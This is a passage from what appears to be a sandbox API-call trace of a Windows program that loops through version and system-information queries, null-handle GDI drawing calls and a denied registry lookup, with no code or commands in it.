dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.201] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.201] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.201] BeginPath (hdc=0x0) returned 0 [0092.201] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.201] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.201] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.201] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.201] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.201] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.201] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.201] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.201] BeginPath (hdc=0x0) returned 0 [0092.201] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.201] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.202] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.202] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.202] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.202] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.202] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.202] BeginPath (hdc=0x0) returned 0 [0092.202] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.202] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.202] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.202] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.202] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.203] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.203] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.203] BeginPath (hdc=0x0) returned 0 [0092.203] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.203] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.203] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.203] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.203] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.203] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.203] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.203] BeginPath (hdc=0x0) returned 0 [0092.203] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.203] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.203] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.204] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.204] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.204] BeginPath (hdc=0x0) returned 0 [0092.204] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.204] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.204] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.204] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.204] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.204] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.204] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.204] BeginPath (hdc=0x0) returned 0 [0092.204] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.204] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.204] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.204] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.279] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.279] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.280] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.280] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.280] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.280] BeginPath (hdc=0x0) returned 0 [0092.280] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.280] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.280] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.280] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.280] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.280] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.280] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.280] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.280] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.280] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.280] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.280] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.280] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.280] BeginPath (hdc=0x0) returned 0 [0092.280] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.280] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.280] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.280] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.280] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.280] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.281] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.281] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.281] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.281] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.281] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.281] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.281] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.281] BeginPath (hdc=0x0) returned 0 [0092.281] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.281] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.281] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.281] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.281] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.281] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.281] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.281] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.281] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.281] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.281] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.281] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.281] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.281] BeginPath (hdc=0x0) returned 0 [0092.281] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.281] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.281] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.281] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.281] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.281] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.282] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.282] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.282] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.282] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.282] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.282] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.282] BeginPath (hdc=0x0) returned 0 [0092.282] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.282] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.282] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.282] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.282] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.282] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.282] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.282] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.282] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.282] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.282] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.282] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.282] BeginPath (hdc=0x0) returned 0 [0092.282] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.283] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.283] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.283] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.283] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.283] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.283] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.283] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.283] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.283] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.283] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.283] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.283] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.283] BeginPath (hdc=0x0) returned 0 [0092.283] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.283] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 